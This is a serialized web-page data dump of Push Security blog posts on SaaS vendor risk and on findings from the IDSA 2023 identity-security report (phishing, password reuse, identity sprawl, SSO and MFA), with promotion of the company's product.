",[284010],{"type":370},{},{"nodeType":250,"data":284013,"content":284014},{},[284015],{"nodeType":254,"data":284016,"content":284017},{},[284018],{"nodeType":178,"data":284019,"content":284020},{},[284021],{"nodeType":173,"value":284022,"marks":284023,"data":284024},"You want to see features like MFA, SSO (either social login through OIDC or, ideally, SAML), and bonus points for the ability to enforce these controls. This is especially important on platforms where the data is high-risk.",[],{},{"nodeType":254,"data":284026,"content":284027},{},[284028,284036],{"nodeType":178,"data":284029,"content":284030},{},[284031],{"nodeType":173,"value":284032,"marks":284033,"data":284035},"They operate in a sanctioned country ",[284034],{"type":370},{},{"nodeType":250,"data":284037,"content":284038},{},[284039],{"nodeType":254,"data":284040,"content":284041},{},[284042],{"nodeType":178,"data":284043,"content":284044},{},[284045],{"nodeType":173,"value":284046,"marks":284047,"data":284048},"Clearly SaaS providers operating from (or that have close ties with) sanctioned or politically-complicated countries represent additional risk.",[],{},{"nodeType":254,"data":284050,"content":284051},{},[284052,284060],{"nodeType":178,"data":284053,"content":284054},{},[284055],{"nodeType":173,"value":284056,"marks":284057,"data":284059},"The SaaS vendor may not have the resources to adequately protect your sensitive data. ",[284058],{"type":370},{},{"nodeType":250,"data":284061,"content":284062},{},[284063],{"nodeType":254,"data":284064,"content":284065},{},[284066],{"nodeType":178,"data":284067,"content":284068},{},[284069],{"nodeType":173,"value":284070,"marks":284071,"data":284072},"Also, question vendors that are so small that it is hard to imagine they can afford to spend significant resources on security. ",[],{},{"nodeType":178,"data":284074,"content":284075},{},[284076],{"nodeType":173,"value":284077,"marks":284078,"data":284079},"These are really common apps that integrate with your Google Workspace or Microsoft 365 - they add a feature or help streamline the employee’s workflow but aren’t a fully baked SaaS app with funding, a product and engineering team, or customer support.",[],{},{"nodeType":169,"data":284081,"content":284082},{},[284083],{"nodeType":173,"value":284084,"marks":284085,"data":284086},"If you can’t establish trust with a SaaS provider…",[],{},{"nodeType":178,"data":284088,"content":284089},{},[284090],{"nodeType":173,"value":284091,"marks":284092,"data":284093},"While the hope is that you can establish enough trust with third-party SaaS providers to allow employees to use the app, there will be exceptions.",[],{},{"nodeType":235,"data":284095,"content":284096},{},[284097],{"nodeType":173,"value":284098,"marks":284099,"data":284100},"Guide employees to secure alternatives early, before they invest too much time in a risky platform",[],{},{"nodeType":178,"data":284102,"content":284103},{},[284104],{"nodeType":173,"value":284105,"marks":284106,"data":284107},"Obviously, you can block the apps that you’ve deemed too risky for your company’s risk profile, which will reduce the attack surface. However, doing that in a vacuum, without working with the employees who are using (or testing) a SaaS application, can roadblock their work. ",[],{},{"nodeType":178,"data":284109,"content":284110},{},[284111],{"nodeType":173,"value":284112,"marks":284113,"data":284114},"While it solves your need for strong SaaS security, if you don’t provide employees with an alternative, more secure app to test, you’re burning all good will with the rest of the company. ",[],{},{"nodeType":178,"data":284116,"content":284117},{},[284118],{"nodeType":173,"value":284119,"marks":284120,"data":284121},"Worst case scenario, they’ll work around you to use the tool you removed by using their personal laptop or personal email to log in. ",[],{},{"nodeType":178,"data":284123,"content":284124},{},[284125],{"nodeType":173,"value":284126,"marks":284127,"data":284128},"The best path forward is to get into the SaaS adoption process early, as shown in this employee SaaS app adoption workflow: ",[],{},{"nodeType":312,"data":284130,"content":284134},{"target":284131},{"sys":284132},{"id":284133,"type":317,"linkType":318},"6HzSQ8wPVn9RfDSFWGaCh8",[],{"nodeType":178,"data":284136,"content":284137},{},[284138],{"nodeType":173,"value":284139,"marks":284140,"data":284141},"The goal is to catch those apps that are high risk, either because the data going into them (or that will be) is high risk or because the app can perform some high-risk action (like managing your inventory or sending emails to customers or your behalf). ",[],{},{"nodeType":178,"data":284143,"content":284144},{},[284145],{"nodeType":173,"value":284146,"marks":284147,"data":284148},"By getting in early, you can focus your efforts on these high-risk vendors and apps to make sure they can be trusted with their data. ",[],{},{"nodeType":178,"data":284150,"content":284151},{},[284152,284156,284165],{"nodeType":173,"value":284153,"marks":284154,"data":284155},"We’ve written more about this ",[],{},{"nodeType":1698,"data":284157,"content":284160},{"target":284158},{"sys":284159},{"id":281802,"type":317,"linkType":318},[284161],{"nodeType":173,"value":28052,"marks":284162,"data":284164},[284163],{"type":194},{},{"nodeType":173,"value":284166,"marks":284167,"data":284168}," and it’s worth your time to read it, we promise. Blocking simply doesn’t work and it frustrates the team, so please consider this new way of securing SaaS. ",[],{},{"nodeType":169,"data":284170,"content":284171},{},[284172],{"nodeType":173,"value":284173,"marks":284174,"data":284175},"Try a tool to automate SaaS account security improvements",[],{},{"nodeType":178,"data":284177,"content":284178},{},[284179],{"nodeType":173,"value":284180,"marks":284181,"data":284182},"Check out SaaS security tools that don’t only look at the SaaS provider or the SaaS platform itself, but which also focus on the SaaS account or user identity level. ",[],{},{"nodeType":178,"data":284184,"content":284185},{},[284186],{"nodeType":173,"value":284187,"marks":284188,"data":284189},"Once you have visibility into which apps employees are using, you can dig into whether they’re using security features like MFA or using strong passwords. If they're not, use Push to equip them to enable MFA on their own: ",[],{},{"nodeType":312,"data":284191,"content":284195},{"target":284192},{"sys":284193},{"id":284194,"type":317,"linkType":318},"22jQt6xKpBHthBFqYlzKD1",[],{"nodeType":178,"data":284197,"content":284198},{},[284199],{"nodeType":173,"value":284200,"marks":284201,"data":284202},"Modern SaaS security solutions like Push can not only give you visibility into that information, but automate the process of reaching out to employees to help them turn on security features or updating weak passwords in a few short clicks.",[],{},{"nodeType":169,"data":284204,"content":284205},{},[284206],{"nodeType":173,"value":284207,"marks":284208,"data":284209},"Manage SaaS risk as scale without overburdening your team",[],{},{"nodeType":178,"data":284211,"content":284212},{},[284213],{"nodeType":173,"value":284214,"marks":284215,"data":284216},"\nWhen facing a list of hundreds of apps that employees are using in your business, doing due diligence feels like a daunting task. Push can help with this as well.",[],{},{"nodeType":178,"data":284218,"content":284219},{},[284220],{"nodeType":173,"value":284221,"marks":284222,"data":284223},"You can classify SaaS apps directly in the Push platform based on:",[],{},{"nodeType":250,"data":284225,"content":284226},{},[284227,284237],{"nodeType":254,"data":284228,"content":284229},{},[284230],{"nodeType":178,"data":284231,"content":284232},{},[284233],{"nodeType":173,"value":284234,"marks":284235,"data":284236},"the sensitivity of the data they contain",[],{},{"nodeType":254,"data":284238,"content":284239},{},[284240],{"nodeType":178,"data":284241,"content":284242},{},[284243],{"nodeType":173,"value":284244,"marks":284245,"data":284246},"the permissions they've been granted using the Sensitivity level field",[],{},{"nodeType":178,"data":284248,"content":284249},{},[284250],{"nodeType":173,"value":284251,"marks":284252,"data":284253},"Then use the Approval status option to capture your decision about an app. ",[],{},{"nodeType":312,"data":284255,"content":284259},{"target":284256},{"sys":284257},{"id":284258,"type":317,"linkType":318},"5rACOqYdUseU5rJqTSkaK5",[],{"nodeType":178,"data":284261,"content":284262},{},[284263,284267,284278],{"nodeType":173,"value":284264,"marks":284265,"data":284266},"This helps your team suss out the risk so you can make the right choice, without having to have discussions in side channels. ",[],{},{"nodeType":1698,"data":284268,"content":284272},{"target":284269},{"sys":284270},{"id":284271,"type":317,"linkType":318},"1BuDaKpiwwntLe4goObvgb",[284273],{"nodeType":173,"value":284274,"marks":284275,"data":284277},"Read more about how this works",[284276],{"type":194},{},{"nodeType":173,"value":1477,"marks":284279,"data":284280},[],{},"Focus on account and identity security to reduce SaaS risks","You’ve probably locked down the known cloud services your company is using, but what about all those other SaaS apps people in the company are using? \n","2023-08-15T00:00:00.000Z","focus-on-account-security-to-reduce-saas-risks",{"items":284286},[284287,284289],{"sys":284288,"name":26133},{"id":26132},{"sys":284290,"name":26137},{"id":26136},{"items":284292},[284293],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":284294},{"url":273636},{"items":284296},[284297],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":284298},{"url":273636},{"json":284300,"links":284921},{"nodeType":165,"data":284301,"content":284302},{},[284303,284324,284331,284338,284345,284352,284371,284378,284385,284401,284408,284415,284422,284429,284436,284443,284450,284469,284497,284504,284511,284517,284536,284556,284563,284569,284587,284594,284601,284608,284615,284622,284645,284652,284659,284666,284672,284679,284686,284693,284700,284708,284729,284745,284752,284760,284767,284778,284785,284796,284803,284821,284828,284835,284842,284849,284855,284862,284869,284875,284893,284899,284910,284915],{"nodeType":178,"data":284304,"content":284305},{},[284306,284310,284320],{"nodeType":173,"value":284307,"marks":284308,"data":284309},"Identity Defined Security Alliance (IDSA) recently released their 2023 report: ",[],{},{"nodeType":186,"data":284311,"content":284313},{"uri":284312},"https://www.idsalliance.org/white-paper/2023-trends-in-securing-digital-identities/",[284314],{"nodeType":173,"value":284315,"marks":284316,"data":284319},"Trends in Securing Digital Identities",[284317,284318],{"type":194},{"type":1646},{},{"nodeType":173,"value":284321,"marks":284322,"data":284323},", which had some interesting data to consider as you think about securing identities in the cloud for your organization.",[],{},{"nodeType":178,"data":284325,"content":284326},{},[284327],{"nodeType":173,"value":284328,"marks":284329,"data":284330},"Identities have quickly become the new perimeter, leading attackers to target identities as the primary way to access sensitive corporate data. Organizations and security professionals are considering identity security top of mind, as a result. The report found that 68% of companies say identity-related attacks directly impacted their business in 2023. ",[],{},{"nodeType":169,"data":284332,"content":284333},{},[284334],{"nodeType":173,"value":284335,"marks":284336,"data":284337},"1. Passwords are (still) the weakest link ",[],{},{"nodeType":178,"data":284339,"content":284340},{},[284341],{"nodeType":173,"value":284342,"marks":284343,"data":284344},"It’s no surprise that this survey found that phishing is the most common identity security-related attack, reported by 57% of survey respondents. Poor password hygiene like employees reusing passwords across work and personal accounts was often reported (by 37%) as a weakness that could lead to identity-based attacks.. ",[],{},{"nodeType":178,"data":284346,"content":284347},{},[284348],{"nodeType":173,"value":284349,"marks":284350,"data":284351},"Further exacerbating this issue, employees often reuse passwords across many the cloud and SaaS applications they’re using, and 31% reported that employees share login credentials with their colleagues for work cloud and SaaS apps. ",[],{},{"nodeType":178,"data":284353,"content":284354},{},[284355,284359,284367],{"nodeType":173,"value":284356,"marks":284357,"data":284358},"The risk of these security shortcomings is real and a concern today, not just a future problem. Our recent ",[],{},{"nodeType":186,"data":284360,"content":284361},{"uri":74609},[284362],{"nodeType":173,"value":284363,"marks":284364,"data":284366},"open-source research on SaaS attacks",[284365],{"type":194},{},{"nodeType":173,"value":284368,"marks":284369,"data":284370}," demonstrated how attackers will take advantage of those weak and/or reused login credentials as an entry point for attack chains, allowing them to move laterally within the organization and across apps to get to the data they’re targeting.",[],{},{"nodeType":178,"data":284372,"content":284373},{},[284374],{"nodeType":173,"value":284375,"marks":284376,"data":284377},"None of these finds are shocking for anyone in security. However, what may be new is where identities start and end. Let’s dig into that.",[],{},{"nodeType":169,"data":284379,"content":284380},{},[284381],{"nodeType":173,"value":284382,"marks":284383,"data":284384},"2. Identity security sprawl makes it a challenge to manage digital identities and data sprawl ",[],{},{"nodeType":178,"data":284386,"content":284387},{},[284388,284392,284397],{"nodeType":173,"value":284389,"marks":284390,"data":284391},"Many readers may think of identity as an employee’s SSO identity first, but it’s important to consider identity sprawl - anytime an employee signs up to a cloud application with a password, they’ve created a new account ",[],{},{"nodeType":173,"value":284393,"marks":284394,"data":284396},"and ",[284395],{"type":370},{},{"nodeType":173,"value":284398,"marks":284399,"data":284400},"a new identity on that app. ",[],{},{"nodeType":178,"data":284402,"content":284403},{},[284404],{"nodeType":173,"value":284405,"marks":284406,"data":284407},"This happens because they’re using a username and password to sign up, which has created a new identity that only exists on that app. If, on the other hand, they clicked “Signup with Google” or “Signup with Microsoft,” they would have created a new account, but used their Google and Microsoft identity that already exists and is managed by the organization they work for.",[],{},{"nodeType":169,"data":284409,"content":284410},{},[284411],{"nodeType":173,"value":284412,"marks":284413,"data":284414},"3. More SaaS = More identities = More opportunities for attackers",[],{},{"nodeType":178,"data":284416,"content":284417},{},[284418],{"nodeType":173,"value":284419,"marks":284420,"data":284421},"Another finding from the survey is that 52% of respondents said the adoption of more cloud applications is driving an increase in the number of identities. As employees sign up for SaaS and cloud applications on their own, they’re adding more assets and identities to your attack surface. They’re also adding more third-party vendors to your supply chain. ",[],{},{"nodeType":178,"data":284423,"content":284424},{},[284425],{"nodeType":173,"value":284426,"marks":284427,"data":284428},"You can see how quickly identity management can become difficult to manage and a really juicy new attack surface for attackers. On average, teams use 40-60 apps for work. If they’re not using a social login (“Signup with Google” or “Signup with Microsoft”), it’s not just the SaaS accounts that are exploding but also the number of identities security and IT have to track, monitor, and secure. Add in sharing credentials across the team and password reuse that was mentioned earlier, and the scope of the problem explodes pretty quickly.",[],{},{"nodeType":235,"data":284430,"content":284431},{},[284432],{"nodeType":173,"value":284433,"marks":284434,"data":284435},"Doesn’t SSO solve this?",[],{},{"nodeType":178,"data":284437,"content":284438},{},[284439],{"nodeType":173,"value":284440,"marks":284441,"data":284442},"SSO is the ideal, gold standard solution for managing your SaaS security risks. The big issue is that very, very few apps, particularly the smaller ones most of the employees in your company will be signing up for, offer SSO integrations. ",[],{},{"nodeType":178,"data":284444,"content":284445},{},[284446],{"nodeType":173,"value":284447,"marks":284448,"data":284449},"When we looked at the apps we cover, only 30% of them offered SAML SSO integrations. For the other 70% of apps, SSO isn’t even an option.",[],{},{"nodeType":178,"data":284451,"content":284452},{},[284453,284457,284466],{"nodeType":173,"value":284454,"marks":284455,"data":284456},"Making things worse, of those few apps that did offer SAML SSO as a feature, they offered it as a paid feature that you can only access at a high pricing tier, typically Enterprise or the highest pricing tier. This is known in the industry as the “SSO tax.” So, at the moment, this means SAML SSO isn’t a practical option for most apps. We wrote much more on this ",[],{},{"nodeType":1698,"data":284458,"content":284461},{"target":284459},{"sys":284460},{"id":283745,"type":317,"linkType":318},[284462],{"nodeType":173,"value":28052,"marks":284463,"data":284465},[284464],{"type":194},{},{"nodeType":173,"value":283752,"marks":284467,"data":284468},[],{},{"nodeType":178,"data":284470,"content":284471},{},[284472,284476,284481,284485,284494],{"nodeType":173,"value":284473,"marks":284474,"data":284475},"Many more apps offer social logins (“Login with Google” - aka OIDC SSO), and while this isn’t quite as good as SAML, it’s a far better option than local passwords for each SaaS app. ",[],{},{"nodeType":173,"value":284477,"marks":284478,"data":284480},"Our advice is you should prefer social logins over usernames and passwords wherever possible",[284479],{"type":370},{},{"nodeType":173,"value":284482,"marks":284483,"data":284484},". Read more about that ",[],{},{"nodeType":1698,"data":284486,"content":284489},{"target":284487},{"sys":284488},{"id":273995,"type":317,"linkType":318},[284490],{"nodeType":173,"value":28052,"marks":284491,"data":284493},[284492],{"type":194},{},{"nodeType":173,"value":1477,"marks":284495,"data":284496},[],{},{"nodeType":169,"data":284498,"content":284499},{},[284500],{"nodeType":173,"value":284501,"marks":284502,"data":284503},"4. Organizations know they need to secure identities, but struggle to stay ahead of the sprawl",[],{},{"nodeType":178,"data":284505,"content":284506},{},[284507],{"nodeType":173,"value":284508,"marks":284509,"data":284510},"In the IDSA report, survey respondents were asked to consider how they would improve identity security going forward, after experiencing damage to the business from attack(s). ",[],{},{"nodeType":312,"data":284512,"content":284516},{"target":284513},{"sys":284514},{"id":284515,"type":317,"linkType":318},"1xmO3ndyH1Px7BWKcUYpz9",[],{"nodeType":178,"data":284518,"content":284519},{},[284520,284525,284533],{"nodeType":173,"value":284521,"marks":284522,"data":284524},"Source: ",[284523],{"type":1646},{},{"nodeType":186,"data":284526,"content":284527},{"uri":284312},[284528],{"nodeType":173,"value":284312,"marks":284529,"data":284532},[284530,284531],{"type":194},{"type":1646},{},{"nodeType":173,"value":37,"marks":284534,"data":284535},[],{},{"nodeType":178,"data":284537,"content":284538},{},[284539,284543,284552],{"nodeType":173,"value":284540,"marks":284541,"data":284542},"At the top of that list (42%) was basic multi-factor authentication (MFA) implementation for all employees. That sounds like a simple task, but when you’re staring down a list of all of your IT-managed cloud apps and adding all those work apps that employees have signed up for on their own (each of these unmanaged employee-adopted SaaS applications are known as a shadow identity, more on that ",[],{},{"nodeType":1698,"data":284544,"content":284547},{"target":284545},{"sys":284546},{"id":273639,"type":317,"linkType":318},[284548],{"nodeType":173,"value":28052,"marks":284549,"data":284551},[284550],{"type":194},{},{"nodeType":173,"value":284553,"marks":284554,"data":284555},"), it can feel like an impossible task.",[],{},{"nodeType":178,"data":284557,"content":284558},{},[284559],{"nodeType":173,"value":284560,"marks":284561,"data":284562},"That’s where tools (like Push) can help. We work directly with employees via ChatOps to help them harden their identities by turning on MFA and creating stronger, unique passwords for the apps they’ve signed up for with credentials. ",[],{},{"nodeType":312,"data":284564,"content":284568},{"target":284565},{"sys":284566},{"id":284567,"type":317,"linkType":318},"7sDZGdgD6auvjWvFKvpNUJ",[],{"nodeType":178,"data":284570,"content":284571},{},[284572,284576,284584],{"nodeType":173,"value":284573,"marks":284574,"data":284575},"Read more about this feature ",[],{},{"nodeType":186,"data":284577,"content":284579},{"uri":284578},"https://pushsecurity.com/uc/mfa-and-password-manager-adoption/",[284580],{"nodeType":173,"value":28052,"marks":284581,"data":284583},[284582],{"type":194},{},{"nodeType":173,"value":197,"marks":284585,"data":284586},[],{},{"nodeType":169,"data":284588,"content":284589},{},[284590],{"nodeType":173,"value":284591,"marks":284592,"data":284593},"5. Reviewing who and what can access corporate data is a top concern",[],{},{"nodeType":178,"data":284595,"content":284596},{},[284597],{"nodeType":173,"value":284598,"marks":284599,"data":284600},"The next priority on that list of how to mitigate identity-related attacks was “more timely reviews of access to sensitive data.”",[],{},{"nodeType":178,"data":284602,"content":284603},{},[284604],{"nodeType":173,"value":284605,"marks":284606,"data":284607},"Each SaaS app, cloud app, and OAuth integration needs to interact with business data and systems in some way, either by the employee granting access in initial permissions consent flows during signup or by administrators consenting as part of onboarding centralized cloud platforms for the organization.",[],{},{"nodeType":178,"data":284609,"content":284610},{},[284611],{"nodeType":173,"value":284612,"marks":284613,"data":284614},"Similar to MFA adoption across all the apps, tracking and managing all the accounts, applications, and integrations to your core work platforms can feel overwhelming. ",[],{},{"nodeType":178,"data":284616,"content":284617},{},[284618],{"nodeType":173,"value":284619,"marks":284620,"data":284621},"In order to access risk and review access to sensitive data, you need an automated way to:",[],{},{"nodeType":250,"data":284623,"content":284624},{},[284625,284635],{"nodeType":254,"data":284626,"content":284627},{},[284628],{"nodeType":178,"data":284629,"content":284630},{},[284631],{"nodeType":173,"value":284632,"marks":284633,"data":284634},"Find the work apps employees are using because they interact with corporate data and,",[],{},{"nodeType":254,"data":284636,"content":284637},{},[284638],{"nodeType":178,"data":284639,"content":284640},{},[284641],{"nodeType":173,"value":284642,"marks":284643,"data":284644},"Quickly understand what data each app or integration can access",[],{},{"nodeType":178,"data":284646,"content":284647},{},[284648],{"nodeType":173,"value":284649,"marks":284650,"data":284651},"With this information, you can make better decisions about whether to accept the risk these apps and integrations present to their business - balancing security risk and internal resources for auditing, monitoring and hardening these identities, while not becoming a blocker to the overall business.",[],{},{"nodeType":169,"data":284653,"content":284654},{},[284655],{"nodeType":173,"value":284656,"marks":284657,"data":284658},"6. Organizations perceive internal hurdles to secure identities",[],{},{"nodeType":178,"data":284660,"content":284661},{},[284662],{"nodeType":173,"value":284663,"marks":284664,"data":284665},"One of the more telling takeaways from the report is that respondents don’t feel that they’re armed and ready to secure identities. They cited the following concerns:",[],{},{"nodeType":312,"data":284667,"content":284671},{"target":284668},{"sys":284669},{"id":284670,"type":317,"linkType":318},"5Db5gG8JeV3U6tT2eHFmvh",[],{"nodeType":178,"data":284673,"content":284674},{},[284675],{"nodeType":173,"value":284676,"marks":284677,"data":284678},"The top two issues identified were issues of complexity, both in the identity frameworks themselves and with the organization’s technology stack.",[],{},{"nodeType":178,"data":284680,"content":284681},{},[284682],{"nodeType":173,"value":284683,"marks":284684,"data":284685},"The other issues are concerns we hear fairly often in this industry: no budget, not enough internal expertise, and not enough manpower and time.",[],{},{"nodeType":178,"data":284687,"content":284688},{},[284689],{"nodeType":173,"value":284690,"marks":284691,"data":284692},"In the next section, we’ll explore how Push can help address each of these barriers to securing identities.",[],{},{"nodeType":169,"data":284694,"content":284695},{},[284696],{"nodeType":173,"value":284697,"marks":284698,"data":284699},"Overcome these barriers with Push",[],{},{"nodeType":178,"data":284701,"content":284702},{},[284703],{"nodeType":173,"value":284704,"marks":284705,"data":284707},"Barrier #1: Identity frameworks are complicated with multiple vendors and different architectures",[284706],{"type":370},{},{"nodeType":178,"data":284709,"content":284710},{},[284711,284715,284725],{"nodeType":173,"value":284712,"marks":284713,"data":284714},"Push tracks where your identity providers (IdPs) are being used across your cloud environment, including popular managed IdPs like Google, Microsoft and Okta that use SAML and OIDC (",[],{},{"nodeType":1698,"data":284716,"content":284719},{"target":284717},{"sys":284718},{"id":273995,"type":317,"linkType":318},[284720],{"nodeType":173,"value":284721,"marks":284722,"data":284724},"aka “social login”",[284723],{"type":194},{},{"nodeType":173,"value":284726,"marks":284727,"data":284728},") SSO, as well as custom or self-hosted IdPs like Active Directory Federation Services (ADFS).",[],{},{"nodeType":178,"data":284730,"content":284731},{},[284732,284737,284740],{"nodeType":173,"value":284733,"marks":284734,"data":284736},"Barrier #2:",[284735],{"type":370},{},{"nodeType":173,"value":3107,"marks":284738,"data":284739},[],{},{"nodeType":173,"value":284741,"marks":284742,"data":284744},"Our technology environment is very complex",[284743],{"type":370},{},{"nodeType":178,"data":284746,"content":284747},{},[284748],{"nodeType":173,"value":284749,"marks":284750,"data":284751},"Push gives you visibility of all your cloud identities, no matter how decentralized or interconnected your cloud environment is.",[],{},{"nodeType":178,"data":284753,"content":284754},{},[284755],{"nodeType":173,"value":284756,"marks":284757,"data":284759},"Barrier #3: Insufficient budget",[284758],{"type":370},{},{"nodeType":178,"data":284761,"content":284762},{},[284763],{"nodeType":173,"value":284764,"marks":284765,"data":284766},"Push is cost effective for organizations of all sizes. You pay per employee, regardless of how many identities they have or apps they use. Many organizations have purchased Push before getting an IdP like Okta because it is a more cost effective way of securing identities.",[],{},{"nodeType":178,"data":284768,"content":284769},{},[284770,284775],{"nodeType":173,"value":284771,"marks":284772,"data":284774},"Barrier #4: Lack of expertise",[284773],{"type":370},{},{"nodeType":173,"value":10557,"marks":284776,"data":284777},[],{},{"nodeType":178,"data":284779,"content":284780},{},[284781],{"nodeType":173,"value":284782,"marks":284783,"data":284784},"Push is surprisingly simple to use. Roll out the browser extension using MDM, Push will give you instant visibility. You just need to decide which automated remediation workflows you want to turn on.",[],{},{"nodeType":178,"data":284786,"content":284787},{},[284788,284793],{"nodeType":173,"value":284789,"marks":284790,"data":284792},"Barrier #5: Not enough people",[284791],{"type":370},{},{"nodeType":173,"value":10557,"marks":284794,"data":284795},[],{},{"nodeType":178,"data":284797,"content":284798},{},[284799],{"nodeType":173,"value":284800,"marks":284801,"data":284802},"Push doesn’t just find more issues, it also fixes them. When Push detects a security issue, it automatically engages the identity owner and guides them to self-remediate the issue. This makes Push totally scalable and frees-up your security team.",[],{},{"nodeType":178,"data":284804,"content":284805},{},[284806,284809,284818],{"nodeType":173,"value":37,"marks":284807,"data":284808},[],{},{"nodeType":186,"data":284810,"content":284812},{"uri":284811},"https://pushsecurity.com/product/#top",[284813],{"nodeType":173,"value":284814,"marks":284815,"data":284817},"Learn more about how we can help",[284816],{"type":194},{},{"nodeType":173,"value":197986,"marks":284819,"data":284820},[],{},{"nodeType":169,"data":284822,"content":284823},{},[284824],{"nodeType":173,"value":284825,"marks":284826,"data":284827},"Push helps you see which third parties have access to your data ",[],{},{"nodeType":178,"data":284829,"content":284830},{},[284831],{"nodeType":173,"value":284832,"marks":284833,"data":284834},"To manage both identity and data sprawl, lean on a good identity security solution like Push to: ",[],{},{"nodeType":235,"data":284836,"content":284837},{},[284838],{"nodeType":173,"value":284839,"marks":284840,"data":284841},"Track which apps have access to your corporate data ",[],{},{"nodeType":178,"data":284843,"content":284844},{},[284845],{"nodeType":173,"value":284846,"marks":284847,"data":284848},"Find the apps your employees are using, testing, or trialing and the associated digital identities they’ve created, and then see what data those apps were given access to by the employee:",[],{},{"nodeType":312,"data":284850,"content":284854},{"target":284851},{"sys":284852},{"id":284853,"type":317,"linkType":318},"7kdGdM2MAn7HezkvUYlBP1",[],{"nodeType":235,"data":284856,"content":284857},{},[284858],{"nodeType":173,"value":284859,"marks":284860,"data":284861},"Detect new apps employees sign up for",[],{},{"nodeType":178,"data":284863,"content":284864},{},[284865],{"nodeType":173,"value":284866,"marks":284867,"data":284868},"By catching these signups early, you can quickly check out the third-party app vendor before employees give those apps even more corporate data than they did just by signing up and testing the app:",[],{},{"nodeType":312,"data":284870,"content":284874},{"target":284871},{"sys":284872},{"id":284873,"type":317,"linkType":318},"1jIJX2NQZWcE6IMX85P2q6",[],{"nodeType":178,"data":284876,"content":284877},{},[284878,284882,284890],{"nodeType":173,"value":284879,"marks":284880,"data":284881},"You can then also use Push to work automatically with your employees to harden their accounts. Much more information on there ",[],{},{"nodeType":186,"data":284883,"content":284885},{"uri":284884},"https://pushsecurity.com/uc/cloud-data-sprawl/",[284886],{"nodeType":173,"value":28052,"marks":284887,"data":284889},[284888],{"type":194},{},{"nodeType":173,"value":1477,"marks":284891,"data":284892},[],{},{"nodeType":312,"data":284894,"content":284898},{"target":284895},{"sys":284896},{"id":284897,"type":317,"linkType":318},"3PpYZZ4DSBZqykD0zYF8QI",[],{"nodeType":178,"data":284900,"content":284901},{},[284902,284906],{"nodeType":173,"value":284903,"marks":284904,"data":284905},"G",[],{},{"nodeType":173,"value":284907,"marks":284908,"data":284909},"rab a spot in our calendars so we can run through how Push can help with your specific needs and requirements by booking a quick demo.",[],{},{"nodeType":312,"data":284911,"content":284914},{"target":284912},{"sys":284913},{"id":169040,"type":317,"linkType":318},[],{"nodeType":178,"data":284916,"content":284917},{},[284918],{"nodeType":173,"value":37,"marks":284919,"data":284920},[],{},{"entries":284922},{"inline":284923,"hyperlink":284924,"block":284935},[],[284925,284929,284933],{"sys":284926,"__typename":1528,"title":284927,"slug":284928},{"id":283745},"The no-jargon guide to solving shadow SaaS ","protect-your-data-across-all-your-apps-even-the-ones-employees-use-without",{"sys":284930,"__typename":1528,"title":284931,"slug":284932},{"id":273995},"Should I let my employees login with their work Google account?","should-i-let-my-employees-login-with-their-work-google-account",{"sys":284934,"__typename":1528,"title":274148,"slug":274151},{"id":273639},[284936,284943,284950,284957,284964,284971,284977],{"sys":284937,"__typename":5345,"title":284938,"caption":118,"layoutMode":118,"file":284939},{"id":284515},"Identity solutions survey",{"url":284940,"width":284941,"height":284942},"https://images.ctfassets.net/y1cdw1ablpvd/4ZYf1bG2qXgbJmobA8E9sd/ebba20b5fb48cd86cf5e89c8ce27b30f/image1.png",1432,870,{"sys":284944,"__typename":5345,"title":284945,"caption":284946,"layoutMode":118,"file":284947},{"id":284567},"ChatOps for MFA O365","Push message to an employee who hasn’t enabled MFA on their account",{"url":284948,"width":39,"height":284949},"https://images.ctfassets.net/y1cdw1ablpvd/6VOROrUEfy4WGtwTd75Wrx/55e58fca286d08ef337542f8c93139eb/image3.png",187,{"sys":284951,"__typename":5345,"title":284952,"caption":284953,"layoutMode":118,"file":284954},{"id":284670},"IDSA identity security barriers","Survey respondents perceive these barriers as restricting how much they can do for identity security in their organization",{"url":284955,"width":284956,"height":219896},"https://images.ctfassets.net/y1cdw1ablpvd/54GsdMeP1NGPtTDwqLMdig/19a76d323db84b812409a702565ab9e1/Screenshot_2023-09-25_at_13.52.07.png",1840,{"sys":284958,"__typename":5345,"title":284959,"caption":284960,"layoutMode":118,"file":284961},{"id":284853},"SaaS dash for IDSA blog","SaaS dashboard with app owner and accounts in the organization",{"url":284962,"width":28027,"height":284963},"https://images.ctfassets.net/y1cdw1ablpvd/VSE6jxxgzRxWl3orrYOD8/126b89e9767c1860405c5c7adcf9d2e7/image7.png",914,{"sys":284965,"__typename":5345,"title":284966,"caption":284967,"layoutMode":118,"file":284968},{"id":284873},"New SaaS channel message ","Get channel messages to your team when an employee signs up for a new SaaS app or creates a new identity",{"url":284969,"width":134174,"height":284970},"https://images.ctfassets.net/y1cdw1ablpvd/7F7AHs0NO5c89q827QFxQK/be73dc7359bc0087dcf5f7e9a1bcf394/image4.png",862,{"sys":284972,"__typename":5345,"title":284973,"caption":284974,"layoutMode":118,"file":284975},{"id":284897},"Account dashboard + Chatops MFA","See all accounts in your organization and allow Push to work directly with employees to harden their accounts",{"url":284976,"width":173178,"height":282938},"https://images.ctfassets.net/y1cdw1ablpvd/4L3L4o9Hyf7kUWbcShsxoZ/8e6ed95c833fb42418d5dd886543ba5a/image2.png",{"sys":284978,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},"content:blog:report-on-identity-based-attacks.json","blog/report-on-identity-based-attacks.json","blog/report-on-identity-based-attacks",{"_path":284983,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":284984,"ogImage":118,"summary":284986,"title":273185,"subtitle":118,"metaTitle":284997,"synopsis":273186,"hashTags":118,"publishedDate":273187,"slug":273188,"tagsCollection":284998,"relatedBlogPostsCollection":285002,"authorsCollection":285610,"content":285614,"_id":285785,"_type":5439,"_source":5440,"_file":285786,"_stem":285787,"_extension":5439},"/blog/product-release-september-2023",{"id":273024,"publishedAt":284985},"2023-09-26T20:30:24.978Z",{"json":284987},{"data":284988,"content":284989,"nodeType":165},{},[284990],{"data":284991,"content":284992,"nodeType":178},{},[284993],{"data":284994,"marks":284995,"value":284996,"nodeType":173},{},[],"Capture app owner and custom notes, quickly understand a newly added app, and hide accounts you don’t want to license.\n","Push Security new product features for September 2023 